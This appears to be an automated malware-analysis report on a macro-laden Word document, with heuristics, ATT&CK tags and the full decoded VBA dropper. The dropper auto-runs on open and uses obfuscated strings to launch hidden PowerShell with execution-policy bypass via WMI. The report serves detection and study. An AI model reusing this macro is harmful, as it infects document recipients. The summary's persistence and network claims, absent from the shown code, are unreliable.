MALICIOUS
230
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
T1027 Obfuscated Files or Information
The sample contains a VBA macro that executes upon opening the document, as indicated by the Document_Open heuristic. This macro utilizes CreateObject and GetObject calls, along with references to VirtualAlloc and GetProcAddress, suggesting it is designed to download and execute a second-stage payload. The script attempts to establish persistence by writing to the registry key HKCU\Software\Microsoft\Windows\CurrentVersion\Run\IAccessible2Proxy and communicates with an IP address and port (10.10.10.10:443).
Heuristics 9
-
Reference to GetProcAddress API high SC_STR_GETPROCADDRESSReference to GetProcAddress API
-
VBA macros detected medium 4 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
fsObj = "Scrip" & "ting" & Chr(46) & "FileSy" & "stemObject" If (CreateObject(fsObj).FolderExists(strfldr)) Then RptFldrStat = True Else RptFldrStat = False End Function -
GetObject call high OLE_VBA_GETOBJGetObject callMatched line in script
Const HIDDEN_WINDOW = 0 Set veni = GetObject(strRtMng) Set vidi = veni.Get(strProc & "Startup") -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Document_Open macro low OLE_VBA_DOCOPENDocument_Open macroMatched line in script
Private Sub Document_Open() in1Line = ActiveDocument.Sections(1).Headers(wdHeaderFooterPrimary).Range.Text: _ -
Reference to VirtualAlloc API medium SC_STR_VIRTUALALLOCReference to VirtualAlloc API
-
Macro/content-enable lure medium SE_ENABLE_LUREDocument instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL https://support.microsoft.com/en-us/kb/924074 In document text (OLE body)
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)
- http://schemas.openxmlformats.org/officeDocument/2006/bibliographyIn document text (OLE body)
- http://schemas.openxmlformats.org/officeDocument/2006/customXmlIn document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 2956 bytes |
SHA-256: 417b2b78cec59cbac73f633471d223f196ef053347643396edb3e52c0f2fc018 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Public in1Line As String
Public strfldr As String
Public strVVV As String
Public strExt As String
Public strRtMng As String
Public strProc As String
Private Sub Document_Open()
in1Line = ActiveDocument.Sections(1).Headers(wdHeaderFooterPrimary).Range.Text: _
ContReplace: _
Enc_Change: _
RptFldrStat: _
Memorandum
End Sub
Private Function ContReplace() As Variant
Dim wordText As String
wordText = "This is an example of Unicode template"
ActiveDocument.StoryRanges(wdMainTextStory).Delete
ActiveDocument.Content.Text = wordText
End Function
Private Function Enc_Change()
Dim strAlpha As String
Dim strPoWP
strAlpha = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"
strPoWP = "SysWOW64" & Chr(92) & Left(Mid(strAlpha, 23), 1) & "indo" & Left(Mid(strAlpha, 23), 1) & "s" & Chr(92) & Left(Mid(strAlpha, 29), 1) & ":"
strVVV = Left(Mid(strAlpha, 16), 1) & Left(Mid(strAlpha, 15), 1) & Left(Mid(strAlpha, 23), 1) & Left(Mid(strAlpha, 5), 1) & _
Left(Mid(strAlpha, 18), 1) & Left(Mid(strAlpha, 19), 1) & Left(Mid(strAlpha, 8), 1) & Left(Mid(strAlpha, 5), 1) & Left(Mid(strAlpha, 12), 1) & Left(Mid(strAlpha, 12), 1)
strExt = "." + Chr(CStr(Asc(Mid$(strAlpha, 5, 1)))) + Chr(CStr(Asc(Mid$(strAlpha, 24, 1)))) + Chr(CStr(Asc(Mid$(strAlpha, 5, 1))))
strPoWP = Split(strPoWP, "\"): strfldr = strPoWP(2) & Chr(92) & strPoWP(1) & Chr(92) & strPoWP(0)
strRtMng = Left(Mid(strfldr, 4), 3) & "mgmts:" & Chr(92) & Chr(92) & Left(Mid(strExt, 1), 1) & Chr(CStr(Asc(Mid$(strfldr, 3, 1)))) & "root" & Chr(92) & "cimv2"
strProc = Left(Mid(strfldr, 4), 3) & "32" & Chr(95) & "Process"
End Function
Private Function RptFldrStat() As Boolean
Dim fsObj As String
fsObj = "Scrip" & "ting" & Chr(46) & "FileSy" & "stemObject"
If (CreateObject(fsObj).FolderExists(strfldr)) Then RptFldrStat = True Else RptFldrStat = False
End Function
Private Function Memorandum() As Variant
If RptFldrStat = True Then strProgramName = strfldr & "\Windows" & strVVV & "\v1.0\" & strVVV & strExt Else strProgramName = strVVV & strExt
Const HIDDEN_WINDOW = 0
Set veni = GetObject(strRtMng)
Set vidi = veni.Get(strProc & "Startup")
Set vici = vidi.SpawnInstance_
vici.ShowWindow = HIDDEN_WINDOW
Set vvv = GetObject(strRtMng & ":" & strProc)
vvv.Create strProgramName & " -" & Chr(101) & Chr(112) & " " & Chr(98) & Chr(121) & Chr(112) & Chr(97) & Chr(115) & Chr(115) & " -NoProfile -" & Chr(110) & Chr(111) & Chr(101) & Chr(120) & Chr(105) & Chr(116) & " -" & Chr(99) & " " & """" & in1Line & """", Null, vici
End Function
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.